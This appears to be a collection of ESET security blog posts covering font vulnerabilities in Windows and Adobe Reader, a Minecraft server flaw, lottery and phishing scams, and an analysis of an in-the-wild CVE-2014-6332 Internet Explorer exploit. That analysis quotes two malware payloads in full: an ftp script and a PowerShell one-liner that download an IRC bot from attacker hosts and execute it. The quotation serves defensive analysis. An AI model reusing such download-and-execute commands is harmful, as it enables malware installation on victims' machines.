Critical vulnerabilities in Windows and Adobe Reader exposed by hacker

A hacker has published an extensive list of Adobe Reader and Windows vulnerabilities based on his research into a relatively obscure area of font management.

Google Project Zero hacker Mateusz Jurczyk found a total of 15 vulnerabilities, any of which could trigger remote code execution or privilege escalation in Adobe Reader or the Windows kernel. However, the two worst (detailed as CVE-2015-3052 for 32-bit and CVE-2015-0093 for 64-bit) exist in the Adobe Type Manager Font Driver, which has existed in the Windows kernel since Windows NT 4.

He told IT blog the The Register that the most serious, an ‘entirely reliable’ BLEND instruction exploit relates to the handling of CharStrings that are responsible for drawing the shape of each glyph at a particular point size.

“The extremely powerful primitive provided by the vulnerability – together with the fact that it affected all supported versions of both Adobe Reader and Microsoft Windows thus making it possible to create an exploit chain leading to a full system compromise with just a single bug – makes it one of the most interesting security issues I have discovered so far,” Jurczyk said.

“The video demonstrates reliable exploitation of a vulnerability in the handling of the BLEND instruction in Type 1 fonts, used in two stages to first achieve arbitrary code execution in Adobe Reader 11.0.10, and further escape the sandbox and elevate privileges to System by attacking the Adobe Type Manager Font Driver in the Windows 8.1 Update 1 32-bit (or 64-bit) kernel”, he continued.

In a blog post the researcher also shared his presentation from the Recon security conference this month called ‘One font vulnerability to rule them all: A story of cross-software ownage, shared codebases and advanced exploitation.’

As welivesecurity.com recently reported, Google has extended the disclosure period for vulnerabilities uncovered in its Project Zero program by an additional two weeks, if a vendor is planning a patch in the two weeks following the deadline. The additional 14 day ‘grace period’ for vendors will “improve industry response times to security bugs, but will result in softer landings for bugs marginally over deadline”, according to Google.

by Karl Thomas, ESET

Minecraft exploit makes it “easy” for hackers to crash servers

A security researcher has posted a Minecraft flaw that makes it “easy” for hackers to crash the game’s servers, reports Ars Technica.

Developer Anmar Askar first noticed the exploit two years ago and notified the game’s creator, Mojang, but after being “ignored” and given several “highly unsatisfactory responses” he has now published the details on his blog.

According to ZD Net, the exploit concerns how the Minecraft sever decompresses and parses data, which, when taken advantage of, can cause a processor load that would exhaust the server’s memory. A fix for the flaw “isn’t exactly that hard,” according to Askar, but the company has failed to address the issue in a series of patches.

“I don’t want to expose thousands of servers to a major vulnerability, yet on the other hand Mojang has failed to act upon it,” he wrote. “Mojang is no longer a small indie company making a little indie game, their software is used by thousands of servers, hundreds of thousands people play on servers running their software at any given time.”

The Register notes that Mojang attempted and failed to patch the flaw after Askar’s blog was published, leaving the game’s server’s still vulnerable.

Minecraft was the victim of an attack earlier this year, after 1,800 logins were leaked online in plain text format. It is thought that the data breach could be used to target gamers with phishing attacks that would put their account details at risk.

Microsoft, who purchased Minecraft last year for $2.5 billion, has not yet responded to the latest exploit.

by Kyle Ellison, ESET

No, there’s no Google Lottery, sorry.

Scammers are keeping busy, sending all sorts of attempts to get to your personal info, which they can then proceed to abuse. This week ESET Ireland received a good deal of this particular sort of spam email. As people conditioned to believe the credibility of “brand names”, adding “Google”, “Gmail” and “Microsoft Windows” to an otherwise a very common scam, guarantees the scammers a few additional victims. And stamping “Approved” as watermark is, in the scammers’ opinion, guaranteed to seal the deal.

goog

Don’t fall for it. Enjoy safer technology.

How was Microsoft Windows exploited in 2014?

Today, we published our research about Windows exploitation in 2014. This report contains interesting information about vulnerabilities in Microsoft Windows and Office patched over the course of the year, drive-by download attacks and mitigation techniques.

The report includes the following information.

  • Vulnerabilities discovered and patched in Microsoft Windows and Office.
  • Statistics about patched vulnerabilities and how they compare with 2013’s statistics.
  • Detailed descriptions of actual exploitation vectors.
  • Vulnerabilities that were exploited in the wild, including a specific table showing ASLR bypass vulnerabilities.
  • Exploitation methods and mitigation techniques for Microsoft’s Internet Explorer web browser (IE).

Last year we saw many exploits that were used for drive-by download attacks. Such attacks are used for silently installing malware. Our report contains detailed information about the nature of drive-by download attacks and how Internet Explorer was improved by Microsoft so that such attacks were mitigated by default.

In the first figure below you can see that Microsoft fixed most of the vulnerabilities in Internet Explorer. Almost all of them belong to the Remote Code Execution type, that is, they can be used to implement drive-by download attacks. This figure includes information about vulnerabilities in Internet Explorer, the Windows GUI subsystem driver, kernel mode drivers, .NET Framework, Windows user mode components and Office.

windows exploitation 1

We can see that a great number of vulnerabilities in the web-browser Internet Explorer have been closed in 2014. Almost all of these vulnerabilities were of the “Remote Code Execution” (RCE) type. This meant that an attacker could execute code remotely in a vulnerable environment, with the help of a specially-crafted web page. Such a web pages could contain special code, called an exploit, to trigger a specific vulnerability. Usually attackers use such exploits for silently installing malware when they detect a vulnerable Windows version. This attack is an example of a drive-by download and this is why we highlighted such exploitations as a major trend in attacks on Internet Explorer, as shown in the Figure below:

windows exploitation 2
Our report includes a specific section describing mitigation techniques that were introduced by Microsoft in the last year. This section covers Windows, Internet Explorer and the EMET tool. Such security features address several types of attack surface. For example, a feature introduced for IE called Out-of-date ActiveX control blocking is useful for blocking all exploits based on vulnerabilities in old versions of Oracle’s Java plugin.

We also look at Local Privilege Escalation (LPE) attacks that are used by attackers for bypassing the browser’s sandbox or to run unauthorized code introduced by malware in kernel mode. In the last year Microsoft addressed a much smaller number of vulnerabilities for win32k.sys than it did in 2013. Unfortunately, today this driver is a major source of such vulnerabilities and often used by attackers.

First exploitation of Internet Explorer ‘Unicorn bug’ in-the-wild

Microsoft released a patch last week for a critical vulnerability allowing remote code execution in Internet Explorer. This vulnerability, known as CVE-2014-6332, and discovered by an IBM X-Force security researcher, is significant because it exploits an old bug present in Internet Explorer versions 3 through 11. This means that most, if not all, Internet Explorer users are vulnerable unless they are using patched systems. It gets worse: the vulnerability not only can be used by an attacker to run arbitrary code on a remote machine, but it can also bypass the Enhanced Protected Mode (EPM) sandbox in IE11 as well as Microsoft’s free anti-exploitation tool, the Enhanced Mitigation Experience Toolkit (EMET).

Earlier this week, a proof-of-concept (PoC) successfully exploiting this vulnerability on Internet Explorer was made publicly available. In fact, this PoC showed that arbitrary code could be run on a machine merely by visiting a specially crafted website, if using an unpatched version of Internet Explorer. It was thus only a matter of time before we started seeing this vulnerability actively used as part of a cybercriminal campaign. Scouring our data, we found several blocked exploitation attempts while our users were browsing a major Bulgarian website. As you might have guessed, the compromised website was using CVE-2014-6332 to install malware on the computers of its unsuspecting visitors.

Compromised Website details

This news agency website, ranked among the 50 most visited websites in Bulgaria and among the 11,000 first worldwide according to Alexa, might just be part of the first significant in-the-wild use of this vulnerability. As far as we can tell, there is only one page on the website that has been compromised and is serving this exploit, possibly indicating a testing phase. The page is about some TV Reality show winners.

1_blitz_site

The page source contains an invisible HTML iframe pointing to the exploit:

2_injected_iframe

As seen above, the exploit is hosted on the domain natmasla[.]ru. It is detected by ESET as Win32/Exploit.CVE-2014-6332.A.

The exploit is based on proof-of-concept code published by a Chinese researcher. Here are the credits in this original proof-of-concept:

3_credit_exploit

 

 

 

It is easily modifiable and allows the attacker to write the payload in VBScript.

Strangely, the exploit is actually present two times consecutively. The first time, the payload is:

cd %TEMP%&
@echo open carolinasregion.org>%TEMP%\KdFKkDls.txt&
@echo vbs@carolinasregion.org>>%TEMP%\KdFKkDls.txt&
@echo [REDACTED]>>%TEMP%\KdFKkDls.txt&
@echo binary>>%TEMP%\KdFKkDls.txt&
@echo get natmasla.exe>>%TEMP%\KdFKkDls.txt&
@echo ! natmasla.exe>>%TEMP%\KdFKkDls.txt&
@echo ! del natmasla.exe>>%TEMP%\KdFKkDls.txt&
@echo bye>>%TEMP%\KdFKkDls.txt&
ftp -s:%TEMP%\KdFKkDls.txt&
del %TEMP%\KdFKkDls.txt

It is basically a series of commands that will be executed in the context of cmd.exe. The first group, prefixed by @echo, will write the commands in a text file (“KdFKkDls.txt”, but the name is different each time one pulls the exploit). Then the file is passed to the ftp command. It will connect to an ftp server with a username/password, download a binary, and execute it.
In the second case, the payload is:

powershell.exe (New-Object System.Net.WebClient).DownloadFile(‘hxxp://natmasla[.]ru/ath/sploit/natmasla.exe’,’%TEMP%\natmasla.exe’);(New-Object -com Shell.Application).ShellExecute(‘%TEMP%\natmasla.exe’)

This time it uses PowerShell to download a binary payload, which is actually the same as the one downloaded by the first payload.During our investigation we observed some network difficulties when we tried to fetch the exploit. That could be the reason for the two payloads with different network resources.
The downloaded binary is detected by ESET as Win32/IRCBot.NHR. This malware has numerous capabilities, as launching DDoS attacks, or opening remote shells for the miscreants. As a funny fact, it contains an Einstein’s citation “Anyone who has never made a mistake has never tried anything new.”

Conclusion

Although we were not able to link this particular incident to a known exploit kit, it is a matter of time before mainstream kits integrate this vulnerability. Since all supported versions of Windows were vulnerable to this exploit before the patch was released last week, we can expect this vulnerability conversion rate to be very high. If you haven’t updated Internet Explorer yet, please take time do it right now through Windows Update.

Attention gamers: You’re targets for crime!

Video games have gone since the late 1970s and early 1980s from being a small offshoot of the “traditional” computing industry to becoming a full-fledged multi-billion dollar industry in themselves. Today, companies like Microsoft, Nintendo and SONY generate billions of dollars from sales of games and gaming consoles.

To get an idea of just how pervasive computer gaming is, let’s look at these successful games and consoles, and match them up with some other real-world numbers:

ITEM
NUMBER
EQUIVALENT TO
The Sims 175 000 000
(copies sold over 15 years)
Combined population of Austria, Belgium, Denmark, Germany, Liechtenstein, Luxembourg, Netherlands, Poland, Slovakia and Switzerland
World of Warcraft 7 600 000
(avg. # players over
last 4 quarters)
Cost of 2014 upgrades (in
USD) to Kensington Palace,
United Kingdom
8th generation console units 18 680 000
(PS4+Wii+XBONE units shipped/sold)
Average number of viewers per
episode of Big Bang Theory
during its 2012-2013 season

Computer gaming is a huge and a wildly successful market, and as in any system that works at scale, there are going to be so-called businessmen or entrepreneurs who “seek to optimize their return on investment through whatever means possible” or, to put it more succinctly, criminals who abuse the ecosystem.  But in virtual worlds, can real crimes occur?

The sale of virtual goods (including virtual currencies) is an important part of in-game economies, but also presents criminals with some unique opportunities as well, such as theft of in-game goods, counterfeiting items and gold farming. But computer criminals don’t just target gamers:  Gaming companies themselves can be targeted as well.  Probably the most well-known example of this is the April 2011 breach of the SONY PlayStation Network gaming and Qriocity music streaming service, which resulted in the compromise of the names, addresses and credit card details of 77 million user accounts. ESET provided extensive coverage of the SONY data breach in our blog, starting from the initial report of the breach in April 2011 all the way up to the proposed settlement of a week ago.

For the most part, computer gaming poses no additional risks beyond any other activities you might perform on the Internet.  You may, however, wish to take a few extra precautions, as outlined in the previous two articles from We Live Security:

This is a shortened version of Aryeh Goretsky’s article on We Live Security. Go here for the full story.

How to hack someone’s account? Ask them for their password!

ESET Ireland has been following a surge of phishing emails redirecting users to faked banking, PayPal and Microsoft account sites for harvesting login details.

Although a surprisingly large number of people still use passwords like “12345” or “password” for their various accounts, cybercriminals have taken an easier route than trying to hack into peoples’ accounts. “Ask and you shall receive” seems to be their motto, so they send out emails that pretend to be coming from legitimate sites, notify the user of some unusual activity, and ask them to confirm or deny that activity by “signing into the service”. Except that the service in question isn’t actually there, but a faked site instead, which diligently logs all usernames and passwords entered and delivers them to the happy scammers.

In the past weeks, ESET Ireland has received several different emails of the same nature, and here are some examples:

1. Bank of Ireland

An email purporting to come from Bank of Ireland, claiming your account requires and update and providing a fake link “Click here to complete update”. The email has some bad spelling errors which give it away.

Fake Bank of Ireland email

Fake Bank of Ireland email

 

2. iTunes

An email pretending to be from iTunes, thanking you for purchasing “World Of Go” for €9.65 , then adding “If you did not authorize this purchase, please visit the iTunes Payment Cancellation Form within the next 12 hours in order to cancel the payment,” which requires you to “log in” to the fake iTunes site.

Nice of them to respect our privacy, eh?

Nice of them to respect our privacy, eh?

 

3. PayPal

An email looking like a detailed payment receipt, mimicking PayPal, with all the usual PayPal visual clues, claiming you paid $208.00 USD to Agoda Company online hotel booking site, adding “If you haven’t authorized this charge, click the link below to dispute transaction and get full refund – Dispute transaction (Encrypted Link).” The link, of course, isn’t encrypted and simply leads to a PayPal lookalike login harvesting site.

paypal1

Fake link in “Encrypted link”

kkk

“expert-italia.it” address instead of “PayPal

 

4. Microsoft

An email abusing Microsoft’s name, with the subject line “Microsoft account unusual sign-in activity” that claims they detected unusual sign-in activity into your account, supposedly from South Africa, which is meant to make people suspicious, then offering a solution “If you’re not sure this was you, a malicious user might have your password. Please Verify Your Account and we’ll help you take corrective action.” Of course the only action they’ll be taking is signing into your account with the login details you just provided.

Legitimate looking email.

Legitimate looking email.

“yazarlarparlamentosu.org” instead of “Microsoft Corporation”

“yazarlarparlamentosu.org” instead of “Microsoft Corporation”

hhh

Actual Microsoft account log in

 

What should you do?

First of all, stay informed. The scams you know about are less likely to catch you off guard. We regularly keep you updated on our blog here or on ESET’s We Live Security.

Read such mails carefully, checking for clues. If the email had spelling errors or used poor language it is likely faked. A lot of the scammers come from countries where English is not their first language and they give themselves away. Also goes for similar scams as Gaeilge, where they likely used Google translate to try to fool native Irish speakers.

Do not click on links in emails. Even if you do have a Microsoft account and are alarmed by such an email, open your browser and go to Microsoft site directly. Also make sure the website’s address looks correct. In the case of the faked Microsoft one above, the website address read “yazarlarparlamentosu.org”, which is clearly not “Microsoft”

If you suspect you may have fallen for one of these tricks, change your passwords. To be sure, change them in regular intervals anyway.

If the email you received looks like it’s coming from your bank, pick up the phone and ring them instead of just clicking. They’re accustomed to scams like these and will advise you appropriately.

Think before you click and enjoy safer technology!

 

by Urban Schrott, ESET Ireland

Follow

Get every new post delivered to your Inbox.

Join 102 other followers